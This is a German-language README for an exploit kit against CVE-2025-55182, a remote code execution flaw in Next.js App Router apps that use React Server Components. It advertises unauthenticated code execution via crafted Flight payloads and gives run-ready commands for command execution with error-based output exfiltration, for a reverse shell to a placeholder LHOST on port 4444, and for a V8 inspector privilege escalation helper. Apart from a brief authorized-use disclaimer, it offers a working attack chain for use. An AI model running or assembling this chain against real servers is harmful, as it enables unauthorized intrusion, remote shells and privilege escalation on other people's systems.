
# Eigenständiger Exploit für CVE-2025-55182 Erzielt eine nicht authentifizierte RCE in Next.js App Router über die Flight-Deserialisierung von React Server Components, mit Reverse Shell und Node.js V8 Inspector Privilege-Escalation-Helfer.
Eigenständiger Exploit für CVE-2025-55182 in Next.js-App-Router-Anwendungen, die React Server Components aktivieren. Präparierte RSC-Flight-Payloads an den Server-Action-Endpunkt ermöglichen nicht authentifizierte Remote-Codeausführung. Enthält einen Node.js-V8-Inspector-Helfer (Debug-Port) zur lokalen Privilegienerweiterung, der Code in einem privilegierten Prozess über eine process.mainModule.require-Sandbox-Umgehung ausführt.
CVE: CVE-2025-55182
python3 -m pip install requests # für die Python-PoC(s)
cdp_privesc.pypython3 cdp_privesc.py <target>
react2shell-poc.pypython3 react2shell-poc.py -t http://TARGET:3000 -c "id" # fehlerbasierte Befehls-Exfiltration
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost LHOST --lport 4444
react2shell-poc.py ist p3ta00s öffentlicher CVE-2025-55182-PoC, unverändert von
https://github.com/p3ta00/react2shell-poc für eine eigenständige Kette eingebunden.
cdp_privesc.py (die Node.js-V8-Inspector-Lokale-Privilegienerweiterung) ist original.
Nur für autorisierte Sicherheitstests und Bildungszwecke. Führe dies nur gegen Systeme aus, die dir gehören oder für die du ausdrückliche schriftliche Genehmigung zum Testen hast.
Autor: r3vpwnx